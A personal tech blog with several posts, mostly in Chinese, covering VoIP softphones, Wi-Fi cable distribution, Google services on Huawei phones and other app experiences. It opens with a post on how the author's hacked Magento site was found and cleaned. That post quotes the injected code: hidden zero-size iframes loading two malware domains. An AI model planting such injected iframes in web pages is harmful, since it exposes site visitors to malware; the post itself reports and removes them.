Magento site was compromised

It was my first time to see a hacker is close to me.

I was flooded with notification emails from Google Adsense subjected “Your AdSense Publisher Policy Violation Report” from yesterday afternoon. I immediately tried to visit either blog.goods-pro.com or goods-pro.com to see what was going on. I got a scary warning message saying either site contains malware by Chrome and Firefox (on desktop. Chrome for Android does not do safe browsing check. I don’t know if Firefox does so.)

It took me a while to find out which site contains malware. As blog.goods-pro.com was using AdSense but goods-pro.com wasn’t, at first I thought it was blog.goods-pro.com that were hacked. blog.goods-pro.com was powered by WordPress, so I went through all the plugins and compared with my other WordPress sites, I didn’t find a suspicious plugin.

Then I started to look into the main domain site goods-pro.com, which was installed with Magento. It took me quite a while for me to know there was a good tool from https://sitecheck.sucuri.net/ to check what malware was on the site.

Then it took me another while to find out how the hacker did it. Basically the hacker compromised one of admin’s (not mine) password, and add the following code in three places (design/footer/copyright, design/head/includes, design/footer/absolute_footer) in Magento System >> Configuration.

<iframe src=”https://hersosx2sk.tk/Rnjqs3″ frameborder=”0″ width=”0″ height=”0″></iframe><iframe src=”https://mytokeasn2s.ru/mwRwD7″ frameborder=”0″ width=”0″ height=”0″></iframe>

hersosx2sk.tk and mytokeasn2s.ru are malware sites. And if a site links to them, it is regarded as malware site as well. 

When I disabled access of compromised admin accounts (without removing the injected code), I found Chrome and Firefox stopped giving that scary warnings, and visits to hersosx2sk.tk or mytokeasn2s.ru are redirected to Google. I don’t understand how Google can take control of these domains so quick, but anyway, it is not my business.

At last I removed all malware codes and requested AdSense a review of blog.goods-pro.com.

Best SIP client soft phone is GS Wave

I have tried almost every VOIP soft phone app on Google Play. Before I found GS Wave, I reckoned Zoiper app was the best soft phone, thus I paid for its premium version to get its premium feature of video call.

However I never got this feature working. I wanted to see the video from my video door phone on my mobile with Zoiper. My video door phone supports H264 video codec but Zoiper supports VP8 unless I pay Zoiper again just for H264 codec . Unlike audio codec while a VOIP server can translate audio codec between clients, video codec is said to be P2P. (There may be a way of video codec translation, but I don’t know how.)

I had video calls working between my video door phone and desktop SIP phones which are “hard phones” with H264 built in. And I had audio calls working on all devices. So I was not desperate for video on Zoiper.

Zoiper has a major defect. It cannot stay online 24/7 on latest Android version (I tested on two Huawei Mate 8 and one P9) or iOS. Many times status bar shows it is online but actually it is not reachable. Zoiper was reliable on Android 4.x.x. I guess Zoiper “forgets” to re-register itself when OS goes into sleep. For above reasons I am reluctant to pay Zoiper any more money.

Recently I visited Fanvil website and discovered Fanvil had developed a soft phone called “Vdroid” for free download. To my surprise, Vdroid integrated G729 audio codec and H264 video codec. They are premium codec as on Zoiper. (Later on I learnt G729 patent expired on 1st Jan, 2017 but Zoiper is still selling G729 for money. I knew nothing about H264.) However Vdroid has too many bugs and is not a mature software.

Then I thought other VOIP device manufacturers might have their own soft phones for public. I checked Grandstream, Yealink and Cisco but only found Grandstream generously offering GS Wave. GS Wave has both Android and iOS version, and both works reliably, and both has G729 and H264 built in for free! I cannot wait any longer to recommend GS Wave to everyone. Google Play is overwhelmed by other apps for search results of “sip” or “voip”, and GS Wave is nowhere in the ranking. But trust me, it is the best one.

 

My experience on Wi-Fi distribuion

我深刻理解一个 WiFi 全覆盖的宾馆环境对当代的旅行者是多么的重要,我看中了馈线系统,下决心用它来改善客人的入住体验。但我在电子领域非常无知,如今摸着石子过了河,非常乐意跟大家分享我的心得。

  • 尽量使用柔性馈线。我的馈线总长不超过30米,却用了不易弯曲的直径10mm的 LMR400,给安装带来了很大的困难,对比使用直径 5mm 的柔性馈线所节省的损耗,不太值得。
  • 尽量使用密集天线。我为了少安装几个天线,每楼层过道使用了一个“工业级”的高增益天线,个头大,样子怪怪的,但穿墙效果同样不好,不如每个房间里装一个微型天线。
  • 尽量备齐转接头,英国的转接头又是杀猪价,这种配件能从中国买就不要从英国买。我经验不足,前瞻不够,这小小的工程用了十几种转接头,前后反复采购近十次,走了很多弯路。
  • 其他东西可以从中国买,馈线倒可以在英国采购。在中国买所谓的进口馈线也很贵,还不知真假。英国馈线当然贵,但清仓价很实惠,我想着以后会复制我的成功经验,就多囤了一些货。
  • 标称为 800 – 2500 Mhz 的功分器完全能用在 5800 Mhz 的 WiFi,估计缺点是损耗较大,但短程传输完全可以忽略这些不利因素。
  • 我的双频 AP 的双天线分别传输 2.4G 和 5.8G WiFi。如果馈线只接一路,比如接 2.4G 这一路,那么 2.4G 覆盖完成,另一路的 5.8G 信号强度也会很大(满格),但信号质量很差,无法在 5.8G 传输数据,这让我深刻理解了信号强度和信号质量是完全两个概念,没有正比关系。当时还闹了一个笑话:因为调试时我不知道接的是哪一路信号,发现 5.8G 这一路上不了网,我问 Google “信号强度大但信号质量差是怎么回事”,Google 指示可能是“信号干扰”。因为铺设的馈线跟电力线并行,我暗想精挑细选的 LMR400 线缆屏蔽性这么差,后来查明真正的原因,发现错怪 LMR400 了。
  • 贯穿楼层我只铺了一根馈线,当发现 AP 的双频是分路输出后,我开始寻找双频合路的元器件。可是这么专业的东西不好找啊,万能的淘宝确实有卖,但只有一家,似乎卖家已黄了,总不在线。百度百科上说功分器就是合路器,我就尝试反用了腔体功分器将双频合路,激动地发现这么廉价的元器件和简单的方法也能成功合路传输双频信号。于是感慨三件事:百度也有靠谱的时候、便宜也有好货、实践出真知。前二者未必总是为真,但第三者永远正确。

花了这么大精力学做无线分布,为什么不用市面上唾手可得的 WiFi extender?好吧,给你们科普一下:家用级的 WiFi extender 不稳定,三天两头重启,商业级的 WiFi extender 也很贵,不如花点时间来布线。另外 WiFi extender 存在同频竞争、无法无缝漫游等问题。为什么不用 ACAP 来实现无缝漫游?还是成本、稳定性、带机量三方面的考虑,ACAP 方案还是留给更大的项目吧。

Huawei Mate 8 and Google

自从知道华为应用市场里有谷歌框架安装神器,我就不再等华为 Mate 8 国际版的上市,买了一个行货全网通尝鲜。

Mate 8 的谷歌框架很顺利,但是我碰到了两个非常规的问题:

一是 Google Contacts 没有被同步到手机电话簿。后来发现还需要在华为应用市场上找“联系人同步服务”来安装,安装以后还要在权限管理里赋予“Google 联系人同步”这个应用所有的通讯录权限,之前是“提示”,要改为“允许”。最后重启才正常。

二是只能添加一个 Google 帐号。后来发现可以在某些 Google 应用的 GUI 里添加第二个帐号,我在 Maps 里添加里第二个 Google 帐号,通过这种“曲线救国”的方式,达到在设置里添加第二个 Google 帐号同样的效果。

虽然 Mate 8 终于连上了 Google 服务,但行货手机的一些细节方面用起来实在别扭,总的来说,如果有后悔药,我选择等待 Mate 8 国际版的上市。

Huawei app store has gapps

一直以来我都以为要在 Android 上安装 Google 框架只能求助一些开发者网站,比如 XDA Developers。但我一怕病毒,二怕麻烦,总希望原装设备上开机就带有 Google 框架,所以智能时代我从不买中国的行货手机,因为它们没有 Google 框架。

但最近华为 Mate 8 挺热门,我也关注了很久,可惜迟迟没有国际版,直到今天才听说华为两天前发布了 Mate 8 国际版,但要在世面上看到它,恐怕还得几个月。

正嗟叹中,朋友告诉我,华为应用商店里就有 Google 框架下载,安装好就能像国际版一样用 Google 服务了。有这等好事?我想起之前 Grandstream 也是如此迂回战术,但没想到华为也会。我赶紧上华为应用商店看,还真有一个叫”谷歌框架安装神器”的应用。我拿老妈的一个国行手机试了试,很顺利地装上了 Google 框架。我又拿它来给 Fanvil D900 Android IP Phone 安装 Google 框架,也很顺利安装成功(安装之前要 root D900)。D900 买了两年,一直觉得是鸡肋,就是因为它无法用 Google 服务,当时我频繁联系了 Fanvil 技术支持,他们给我发了好几个 firmware 去更新,都没有成功装上 Google 框架,后来我自行放弃。如今被华为的”谷歌框架安装神器”一举解决,我怎能不兴奋。(不过今天后来我在 Fanvil 官网上下了最新的 D900 firmware,更新后发现此次的 firmware 已带有 Google 框架,只是 Google Play 未安装,但在根目录下存了一个 Google Play 的 apk,安装一下就好了,也无需 root。)

总之,华为能提供 Google 框架,让我对入手国行华为手机再无顾虑。顺便我看了看小米应用商店,没有提供 Google 框架,那就多劝人不要买小米呗。

WP Social Login back to working

WP Social Login 这个插件在芳草苑上好长时间工作不正常了。无法通过 Google 帐号登录,显示的出错信息是:Oops! We ran into an issue. Request failed. Either you have cancelled the authentication or Google refused the connection.

Google authentication failed
Google authentication failed

今天终于找到原因,其实也不是插件的错,而是在 Google 开发者项目设置里没有开启 Google+ API。默认是禁用,启用就行了。

Enable Google+ API
Enable Google+ API

我隐约记得有消息说 Google+ API 发布以后,WP Social Login 从 Google API 转向了 Google+ API。但当时也没留意看,现在也搞不清楚 Google API 和 Google+ API 有什么区别。IT 技术发展太快了,很多概念只能浮于表面,能用足用好已经不错了。

Google Story can be an artist

Google Now 可以当个小蜜,但 Google Story 可以堪称一个艺术家。

她能把非常稀松平常的照片修饰得别有韵味,还能把本不平常的照片装点得非常有气势。

对比我们花大价钱请设计师设计宣传画册,得到的效果不过如此,而 Google 是机器生成的 Story 相册,竟能 PK 人类 50% 的设计师,不禁有些气馁。

Google Story 1
Google Story 1
Google Story 2
Google Story 2
Google Story 3
Google Story 3
Google Story 4
Google Story 4
Google Story 5
Google Story 5
Google Story 6
Google Story 6
Google Story 7
Google Story 7
Google Story 8
Google Story 8

Hangouts SMS integration is useless

Android 手机上 Hangouts app 提示有更新,据说支持 SMS 了,看着更新挺期待的。

我是指望能在电脑上上 Hangouts 输入短信内容,手机上同步得到短信内容,然后直接发送到联系人。虽然我已经用 Talk2phone 实现了电脑收发短信,但 Hangouts 作为 Android 嫡出的 app,我当然希望它能够接管这个功能。但更新以后一用,非常失望。电脑上的 Hangouts 根本看不到 SMS 联系人(其实就是一个手机号码),只有手机上的 Hangouts 能看到,所以无法实现用电脑发短信。Hangouts SMS integration 只是用 Hangouts 来读写 SMS app,重复做了 SMS app 接收和发送的工作。

Hangouts SMS integration 把即时通讯的内容放在了一个 app 里,没有实质意义。更糟的是,我原先在手机上装了 Talk2phone app,实现电脑收发短信的功能(主要是发短信),现在 Hangouts 更新,Talk2phone 的机器人联系人 mobilenotificationsapp@appspot.com 也不见了,估计是 Talk2phone 没有相应地更新。

不仅如此,其他 app 的机器人也不见了,如 livechat。

我赶紧把电脑版的 Hangouts 恢复到早期版本,各个机器人都回来了。Hangouts SMS integration 真是误事。Google 这回没动脑子,推出个不成熟的功能。之前推出很多夭折的产品倒也没影响什么,Gtalk/Hangouts 毕竟是成熟产品,起点不一样啊。

 

 

Google Drive server rejected files uploaded in Windows

Google Drive server rejected file uploaded in Windows
Google Drive server rejects file uploaded in Windows

我发现在 Windows 下我无法上传文件到 Google Drive。我用的是 FireFox,提示的错误信息是 “Server rejected”。一开始我以为是 Google Server 停摆了,但转用 Fedora 下的 FireFox,一切正常。我不信邪,又在 Windows 下尝试上传各种后缀的文件,.jpg, .doc, .pdf 都试过了,全部失败。

我很少在 Windows 下操作,也不知道这个问题存在多久了。难道是 Google 跟 Microsoft 叫劲,给 Windows 用户一点颜色看看?我觉得 Google 不至于干损人不利己的事,但我不确定。于是我试图改变 Windows 下 FireFox 的 User Agent,在 about:config 里新建了一个名为 general.useragent.override 的字串,值为 Mozilla/5.0 (X11; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0。

Custom FireFox user agent
Custom FireFox user agent

这样 FireFox for Windows 看上去象 FireFox for Linux 了。

Forged user agent
Forged user agent

可是,Google Drive 依然是 “Server rejected”。证实 Google 并没有区别对待 Windows 用户。

接着,我继续研究了一下 FireFox 无法上传文件的原因,看来是多账户登录 Google 后的偶然结果。有人说是无法上传至默认账户以外的账户,但我亲自试了一下,这个说法也不准确。看来不要在这个问题上过于纠结,清空一下浏览器历史,一切都正常了。

Google+ makes perfect panoramic pictures

Google+ is so powerful!

I took several pictures when I visited University of Brighton a while ago. I did not mean to make them into a panoramic scene at that time. I just stood by the road and took several random pictures. And today, when I am looking through my Google+ photos, I find this picture. Google+ automatically made a panoramic picture for me.

American Express Community Stadium "made" by Google+
American Express Community Stadium “made” by Google+

Looking at this picture, I am shocked, because I can not find the seam. I have tried to make panoramic pictures before via different methods: integrated function of a camera, a software, a smartphone with 3-axis geomagnetic sensor. None of them came up such a good result even when I shot photos with a tripod.

So I am wondering if this is a viable approach for a even better result:

  1. Shot photos with a SLR camera on a tripod.
  2. Transfer the photos to an Android phone.
  3. Will Android upload the photos and Google+ make a panoramic picture?